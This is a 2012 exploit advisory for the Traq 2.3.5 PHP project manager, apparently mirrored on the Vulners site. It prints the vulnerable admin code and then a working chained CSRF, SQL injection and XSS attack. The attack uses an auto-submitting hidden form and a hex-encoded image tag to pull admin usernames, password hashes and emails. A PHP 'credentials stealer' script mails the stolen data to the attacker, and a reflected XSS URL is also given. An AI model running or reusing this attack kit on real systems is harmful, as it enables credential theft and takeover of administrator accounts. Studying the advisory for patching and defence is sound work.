Vulners
Lucene search
Traq 2.3.5 CSRF / XSS / SQL Injection
`====================================================================
Vulnerable Software: traq-2.3.5
Official Site: TraqProject.org
====================================================================
About Software:
Traq is a PHP powered project manager, capable of tracking issues for multiple projects
with multiple milestones.
====================================================================
Tested on:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
MYSQL: 5.5.25
*/
====================================================================
Vuln Desc:
traq-2.3.5 is prone to: CSRF,XSS,SQL injection vulns.
[+] LESSON NUMBER 1:VULN IS VULN. IT DOESN'T MATTER WHERE IT EXISTS.
====================================================================
I noticed many developers,coders,admins,webmaster always thinks:
"If you find vuln(s) in administration section you can't exploit it.
You need to login to administration section to exploit it.Bla bla bla."
=======I HOPE THIS will be LESSON FOR ALL WHO THINKS LIKE BOTTOM=========
Vulnerable code section:
//admincp/groups.php
====================================================================
// Create
if(@$_POST['action'] == 'create')
{
// Check for errors
if(empty($_POST['values']['name']))
$errors['name'] = l('error_name_empty');
if(!count($errors))
{
// Sort columns from values
$keys = array();
$values = array();
foreach($_POST['values'] as $key => $val)
{
$keys[] = $key;
$values[] = "'".$val."'";
}
$db->query("INSERT INTO ".DBPF."usergroups (".implode(',',$keys).") VALUES(".implode(',',$values).")");
header("Location: groups.php?created");
}
$group = $_POST['values'];
}
// Save Usergroup
if(@$_POST['action'] == 'save')
{
// Check for errors
if(empty($_POST['values']['name']))
$errors['name'] = l('error_name_empty');
if(!count($errors))
{
// Make the query.
$query = array();
foreach($_POST['values'] as $key => $val)
$query[] = $key."='".$val."'";
// Run the query.
$db->query("UPDATE ".DBPF."usergroups SET ".implode(', ',$query)." WHERE id='".$db->res($_REQUEST['edit'])."' LIMIT 1");
header("Location: groups.php?saved");
}
}
====================================================================
We'll exploit 3 vulns together:
CSRF+SQL INJECTION+XSS
As result we will steal admin credentials(login:password:email) from database.
Payload:
mysql> select 0x41646D696E6973747261746F72733C2F613E3C696D67207372633D22687474703A2F2F3139322E3136382E302E31352F6C6561726E2F747261
666669632E7068703F67657470776E65643D \G
*************************** 1. row ***************************
0x41646D696E6973747261746F72733C2F613E3C696D67207372633D22687474703A2F2F3139322E3136382E302E31352F6C6561726E2F747261666669632E7068
703F67657470776E65643D: Administrators</a><img src="http://192.168.0.15/learn/traffic.php?getpwned=
1 row in set (0.00 sec)
mysql> select 0x22206865696774683D302077696474683D30202F3E \G
*************************** 1. row ***************************
0x22206865696774683D302077696474683D30202F3E: " heigth=0 width=0 />
1 row in set (0.00 sec)
//Our "Cookie Stealer" (In this case it is our credentials stealer *aka snifer*)
//traffic.php
==================BEGIN TRAFFIC.PHP===============
<?php
error_reporting(0);
if (isset($_GET['getpwned']))
{
$nastycookies=htmlentities(str_ireplace('\'','',$_GET['getpwned']));//some bugfixes to get rid single quote xD//
$sendto='noscriptkidding_please_IT_IS_ONLY_FOR_EDUCATIONAL_PURPOSES@mustdiehacker';//your mail address.
@mail($sendto,'Your nAsty cookies',PHP_EOL .$nastycookies);//sending mail to you//
}
?>
================ EOF TRAFFIC.HTML=================
================ EOF PAGE1.HTML================
<!DOCTYPE HTML>
<html>
<head>
<title></title>
<style type="text/css">
body
{
background-color:black;
color:red;
}
img
{
position:absolute;
top:20px;
}
iframe
{
position:absolute;
background-color:black;
color:black;
visibility:hidden;
}
</style>
</head>
<body>
<img src="#" /><br>
<iframe src="CSRF_SQL_INJ_XSS_TRAQ.html" />
</body>
</html>
================ EOF PAGE1.HTML================
============BEGIN CSRF_SQL_INJ_XSS_TRAQ.html====================
<body onload="javascript:document.forms[0].submit()">
<form name="pwn" action="http://====>CHANGE HERE<======/admincp/groups.php?edit=1" method="post">
<input type="hidden" name="action" value="save" />
<input type="text" name="values[name]" value="1',name=(select concat(0x41646D696E6973747261746F72733C2F613E3C696D67207372633D22687474703A2F2F3139322E3136382E302E31352F6C6561726E2F747261666669632E7068703F67657470776E65643D,username,0x7c,password,0x7c,email,0x22206865696774683D302077696474683D30202F3E) from traq_users where group_id=1),is_admin='1" />
<input type="radio" name="values[is_admin]" value="1" id="is_admin_yes" checked="checked" />
<input type="radio" name="values[is_admin]" value="0" id="is_admin_no" />
<input type="radio" name="values[create_tickets]" value="1" id="create_tickets_yes" />
<input type="radio" name="values[create_tickets]" value="0" id="create_tickets_no" checked="checked" />
<input type="radio" name="values[update_tickets]" value="1" id="update_tickets_yes" />
<input type="radio" name="values[update_tickets]" value="0" id="update_tickets_no" checked="checked" />
<input type="radio" name="values[comment_tickets]" value="1" id="comment_tickets_yes" />
<input type="radio" name="values[comment_tickets]" value="0" id="comment_tickets_no" checked="checked" />
<input type="radio" name="values[delete_tickets]" value="1" id="delete_tickets_yes" />
<input type="radio" name="values[delete_tickets]" value="0" id="delete_tickets_no" checked="checked" />
<input type="radio" name="values[add_attachments]" value="1" id="add_attachments_yes" />
<input type="radio" name="values[add_attachments]" value="0" id="add_attachments_no" checked="checked" />
</form>
============EOF CSRF_SQL_INJ_XSS_TRAQ.html====================
If your attack was successfull against victim you will receive admin credentials like below:
admin|d033e22ae348aeb5660fc2140aec35850c4da997|[email protected]
@Print screen successfull attack result (@mail'ed credentials to attacker)
http://s018.radikal.ru/i516/1206/14/85c6beab9a42.png
XSS via $_GET:
http://192.168.0.15/learn/traq/upload/admincp/plugins.php?edit&plugin=1"/><script>alert(1);</script>
[+] LESSON NUMBER 2: Do not trust to client side.Sanitize and validate it.
=====================THE END=================================
+++++++++My Special thanks to:+++++++++++++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
++++++++++++++++++++++++++++++++++++++++++++++++
Respect && Thank you.
/AkaStep ^_^
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Jun 2012 00:00Current
0.5Low risk
Vulners AI Score0.5